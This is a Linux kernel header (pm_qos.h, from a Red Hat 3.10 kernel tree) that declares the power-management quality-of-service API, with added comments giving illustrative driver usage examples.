/* /usr/src/kernels/3.10.0-957.10.1.el7.x86_64/include/linux/pm_qos.h */
#ifndef _LINUX_PM_QOS_H
#define _LINUX_PM_QOS_H
/* interface for the pm_qos_power infrastructure of the linux kernel.
 *
 * Mark Gross <mgross@linux.intel.com>
 */
#include <linux/plist.h>
#include <linux/notifier.h>
#include <linux/miscdevice.h>
#include <linux/device.h>
#include <linux/workqueue.h>

enum {
	PM_QOS_RESERVED = 0,
	PM_QOS_CPU_DMA_LATENCY,
	PM_QOS_NETWORK_LATENCY,
	PM_QOS_NETWORK_THROUGHPUT,

	/* insert new class ID */
	PM_QOS_NUM_CLASSES,
};

enum pm_qos_flags_status {
	PM_QOS_FLAGS_UNDEFINED = -1,
	PM_QOS_FLAGS_NONE,
	PM_QOS_FLAGS_SOME,
	PM_QOS_FLAGS_ALL,
};

#define PM_QOS_DEFAULT_VALUE -1

#define PM_QOS_CPU_DMA_LAT_DEFAULT_VALUE	(2000 * USEC_PER_SEC)
#define PM_QOS_NETWORK_LAT_DEFAULT_VALUE	(2000 * USEC_PER_SEC)
#define PM_QOS_NETWORK_THROUGHPUT_DEFAULT_VALUE	0
#define PM_QOS_DEV_LAT_DEFAULT_VALUE		0
#define PM_QOS_LATENCY_TOLERANCE_DEFAULT_VALUE	0
#define PM_QOS_LATENCY_TOLERANCE_NO_CONSTRAINT	(-1)
#define PM_QOS_LATENCY_ANY			((s32)(~(__u32)0 >> 1))

#define PM_QOS_FLAG_NO_POWER_OFF	(1 << 0)
#define PM_QOS_FLAG_REMOTE_WAKEUP	(1 << 1)

struct pm_qos_request {
	struct plist_node node;
	int pm_qos_class;
	struct delayed_work work; /* for pm_qos_update_request_timeout */
};

struct pm_qos_flags_request {
	struct list_head node;
	s32 flags;	/* Do not change to 64 bit */
};

enum dev_pm_qos_req_type {
	DEV_PM_QOS_LATENCY = 1,
	DEV_PM_QOS_FLAGS,
#ifndef __GENKSYMS__
	DEV_PM_QOS_LATENCY_TOLERANCE,
#endif
};

struct dev_pm_qos_request {
	enum dev_pm_qos_req_type type;
	union {
		struct plist_node pnode;
		struct pm_qos_flags_request flr;
	} data;
	struct device *dev;
};

enum pm_qos_type {
	PM_QOS_UNITIALIZED,
	PM_QOS_MAX,		/* return the largest value */
	PM_QOS_MIN		/* return the smallest value */
};

/*
 * Note: The lockless read path depends on the CPU accessing target_value
 * or effective_flags atomically.  Atomic access is only guaranteed on all CPU
 * types Linux supports for 32-bit quantities.
 */
struct pm_qos_constraints {
	struct plist_head list;
	s32 target_value;	/* Do not change to 64 bit */
	s32 default_value;
	enum pm_qos_type type;
	struct blocking_notifier_head *notifiers;
};
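
/*
 * Illustrative note, not part of the original header: readers are expected to
 * fetch target_value through pm_qos_read_value(), declared later in this
 * file, rather than walking the plist under the lock:
 *
 *	s32 cur = pm_qos_read_value(c);	// c is a struct pm_qos_constraints *
 *
 * which is why target_value must stay a 32-bit quantity (see note above).
 */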

struct pm_qos_flags {
	struct list_head list;
	s32 effective_flags;	/* Do not change to 64 bit */
};

struct dev_pm_qos {
	struct pm_qos_constraints latency;
	struct pm_qos_flags flags;
	struct dev_pm_qos_request *latency_req;
	struct dev_pm_qos_request *flags_req;
	RH_KABI_EXTEND(struct pm_qos_constraints latency_tolerance)
	RH_KABI_EXTEND(struct dev_pm_qos_request *latency_tolerance_req)
};

/* Action requested to pm_qos_update_target */
enum pm_qos_req_action {
	PM_QOS_ADD_REQ,		/* Add a new request */
	PM_QOS_UPDATE_REQ,	/* Update an existing request */
	PM_QOS_REMOVE_REQ	/* Remove an existing request */
};
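
/*
 * Illustrative sketch, not part of the original header: the PM QoS core hands
 * one of these actions to pm_qos_update_target(), declared just below,
 * together with the request's plist node, roughly as:
 *
 *	pm_qos_update_target(c, &req->node, PM_QOS_ADD_REQ, value);
 *	pm_qos_update_target(c, &req->node, PM_QOS_UPDATE_REQ, new_value);
 *	pm_qos_update_target(c, &req->node, PM_QOS_REMOVE_REQ, PM_QOS_DEFAULT_VALUE);
 *
 * where c is the struct pm_qos_constraints * that owns the request.
 */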

static inline int dev_pm_qos_request_active(struct dev_pm_qos_request *req)
{
	return req->dev != NULL;
}

int pm_qos_update_target(struct pm_qos_constraints *c, struct plist_node *node,
			 enum pm_qos_req_action action, int value);
bool pm_qos_update_flags(struct pm_qos_flags *pqf,
			 struct pm_qos_flags_request *req,
			 enum pm_qos_req_action action, s32 val);
void pm_qos_add_request(struct pm_qos_request *req, int pm_qos_class,
			s32 value);
void pm_qos_update_request(struct pm_qos_request *req,
			   s32 new_value);
void pm_qos_update_request_timeout(struct pm_qos_request *req,
				   s32 new_value, unsigned long timeout_us);
void pm_qos_remove_request(struct pm_qos_request *req);

int pm_qos_request(int pm_qos_class);
int pm_qos_add_notifier(int pm_qos_class, struct notifier_block *notifier);
int pm_qos_remove_notifier(int pm_qos_class, struct notifier_block *notifier);
int pm_qos_request_active(struct pm_qos_request *req);
s32 pm_qos_read_value(struct pm_qos_constraints *c);
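
/*
 * Illustrative sketch, not part of the original header: typical driver-side
 * use of the class-based API above, for a hypothetical driver that wants CPU
 * wakeup latency capped at 20 usec while I/O is in flight:
 *
 *	static struct pm_qos_request foo_qos;	// hypothetical request object
 *
 *	pm_qos_add_request(&foo_qos, PM_QOS_CPU_DMA_LATENCY, 20);
 *	// ... latency-sensitive work ...
 *	pm_qos_update_request(&foo_qos, PM_QOS_DEFAULT_VALUE);
 *	pm_qos_remove_request(&foo_qos);
 *
 * pm_qos_request(PM_QOS_CPU_DMA_LATENCY) returns the currently aggregated
 * value for that class.
 */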

#ifdef CONFIG_PM
enum pm_qos_flags_status __dev_pm_qos_flags(struct device *dev, s32 mask);
enum pm_qos_flags_status dev_pm_qos_flags(struct device *dev, s32 mask);
s32 __dev_pm_qos_read_value(struct device *dev);
s32 dev_pm_qos_read_value(struct device *dev);
int dev_pm_qos_add_request(struct device *dev, struct dev_pm_qos_request *req,
			   enum dev_pm_qos_req_type type, s32 value);
int dev_pm_qos_update_request(struct dev_pm_qos_request *req, s32 new_value);
int dev_pm_qos_remove_request(struct dev_pm_qos_request *req);
int dev_pm_qos_add_notifier(struct device *dev,
			    struct notifier_block *notifier);
int dev_pm_qos_remove_notifier(struct device *dev,
			       struct notifier_block *notifier);
int dev_pm_qos_add_global_notifier(struct notifier_block *notifier);
int dev_pm_qos_remove_global_notifier(struct notifier_block *notifier);
void dev_pm_qos_constraints_init(struct device *dev);
void dev_pm_qos_constraints_destroy(struct device *dev);
int dev_pm_qos_add_ancestor_request(struct device *dev,
				    struct dev_pm_qos_request *req, s32 value);
#else
static inline enum pm_qos_flags_status __dev_pm_qos_flags(struct device *dev,
							  s32 mask)
			{ return PM_QOS_FLAGS_UNDEFINED; }
static inline enum pm_qos_flags_status dev_pm_qos_flags(struct device *dev,
							s32 mask)
			{ return PM_QOS_FLAGS_UNDEFINED; }
static inline s32 __dev_pm_qos_read_value(struct device *dev)
			{ return 0; }
static inline s32 dev_pm_qos_read_value(struct device *dev)
			{ return 0; }
static inline int dev_pm_qos_add_request(struct device *dev,
					 struct dev_pm_qos_request *req,
					 enum dev_pm_qos_req_type type,
					 s32 value)
			{ return 0; }
static inline int dev_pm_qos_update_request(struct dev_pm_qos_request *req,
					    s32 new_value)
			{ return 0; }
static inline int dev_pm_qos_remove_request(struct dev_pm_qos_request *req)
			{ return 0; }
static inline int dev_pm_qos_add_notifier(struct device *dev,
					  struct notifier_block *notifier)
			{ return 0; }
static inline int dev_pm_qos_remove_notifier(struct device *dev,
					     struct notifier_block *notifier)
			{ return 0; }
static inline int dev_pm_qos_add_global_notifier(
					struct notifier_block *notifier)
			{ return 0; }
static inline int dev_pm_qos_remove_global_notifier(
					struct notifier_block *notifier)
			{ return 0; }
static inline void dev_pm_qos_constraints_init(struct device *dev)
{
	dev->power.power_state = PMSG_ON;
}
static inline void dev_pm_qos_constraints_destroy(struct device *dev)
{
	dev->power.power_state = PMSG_INVALID;
}
static inline int dev_pm_qos_add_ancestor_request(struct device *dev,
				    struct dev_pm_qos_request *req, s32 value)
			{ return 0; }
#endif
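
/*
 * Illustrative sketch, not part of the original header: per-device latency
 * constraints go through the dev_pm_qos_* calls above, e.g. for a
 * hypothetical device pointer dev:
 *
 *	static struct dev_pm_qos_request foo_dev_qos;	// hypothetical
 *
 *	int ret = dev_pm_qos_add_request(dev, &foo_dev_qos,
 *					 DEV_PM_QOS_LATENCY, 100);
 *	if (ret >= 0) {
 *		// ... constraint active ...
 *		dev_pm_qos_update_request(&foo_dev_qos, 50);
 *		dev_pm_qos_remove_request(&foo_dev_qos);
 *	}
 *
 * With CONFIG_PM unset the inline stubs above simply return 0.
 */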

#ifdef CONFIG_PM_RUNTIME
int dev_pm_qos_expose_latency_limit(struct device *dev, s32 value);
void dev_pm_qos_hide_latency_limit(struct device *dev);
int dev_pm_qos_expose_flags(struct device *dev, s32 value);
void dev_pm_qos_hide_flags(struct device *dev);
int dev_pm_qos_update_flags(struct device *dev, s32 mask, bool set);
s32 dev_pm_qos_get_user_latency_tolerance(struct device *dev);
int dev_pm_qos_update_user_latency_tolerance(struct device *dev, s32 val);
int dev_pm_qos_expose_latency_tolerance(struct device *dev);
void dev_pm_qos_hide_latency_tolerance(struct device *dev);

static inline s32 dev_pm_qos_requested_latency(struct device *dev)
{
	return dev->power.qos->latency_req->data.pnode.prio;
}

static inline s32 dev_pm_qos_requested_flags(struct device *dev)
{
	return dev->power.qos->flags_req->data.flr.flags;
}
#else
static inline int dev_pm_qos_expose_latency_limit(struct device *dev, s32 value)
			{ return 0; }
static inline void dev_pm_qos_hide_latency_limit(struct device *dev) {}
static inline int dev_pm_qos_expose_flags(struct device *dev, s32 value)
			{ return 0; }
static inline void dev_pm_qos_hide_flags(struct device *dev) {}
static inline int dev_pm_qos_update_flags(struct device *dev, s32 m, bool set)
			{ return 0; }
static inline s32 dev_pm_qos_get_user_latency_tolerance(struct device *dev)
			{ return PM_QOS_LATENCY_TOLERANCE_NO_CONSTRAINT; }
static inline int dev_pm_qos_update_user_latency_tolerance(struct device *dev, s32 val)
			{ return 0; }
static inline int dev_pm_qos_expose_latency_tolerance(struct device *dev)
			{ return 0; }
static inline void dev_pm_qos_hide_latency_tolerance(struct device *dev) {}

static inline s32 dev_pm_qos_requested_latency(struct device *dev) { return 0; }
static inline s32 dev_pm_qos_requested_flags(struct device *dev) { return 0; }
#endif
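
/*
 * Illustrative sketch, not part of the original header: the CONFIG_PM_RUNTIME
 * helpers above expose a device's latency limit to user space and flip the
 * PM_QOS_FLAG_* bits defined near the top of this file, e.g.:
 *
 *	dev_pm_qos_expose_latency_limit(dev, 1000);	// initial limit, usec
 *	dev_pm_qos_update_flags(dev, PM_QOS_FLAG_NO_POWER_OFF, true);
 *	...
 *	dev_pm_qos_hide_latency_limit(dev);
 */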

#endif
